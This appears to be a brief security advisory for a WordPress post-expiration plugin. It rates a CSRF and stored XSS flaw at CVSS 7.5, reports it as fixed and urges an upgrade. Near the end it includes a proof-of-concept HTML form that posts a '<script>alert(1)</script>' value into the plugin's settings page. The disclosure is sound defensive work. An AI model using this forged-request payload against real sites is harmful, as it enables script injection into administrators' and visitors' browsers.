CVSS Summary
Score | 7.5 High |
---|---|
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Last revised:
A lack of output escaping and safe request processing allows CSRF and XSS.
Current state: Fixed
Score | 7.5 High |
---|---|
Vector | Network |
Complexity | Low |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=post-expirator.php"> <input type="text" name="expired-default-date-format" value=""><script>alert(1)</script>"> <input type="text" name="expirationdateSave" value="kthxbai"> <input type="submit"> </form>
Upgrade immediately.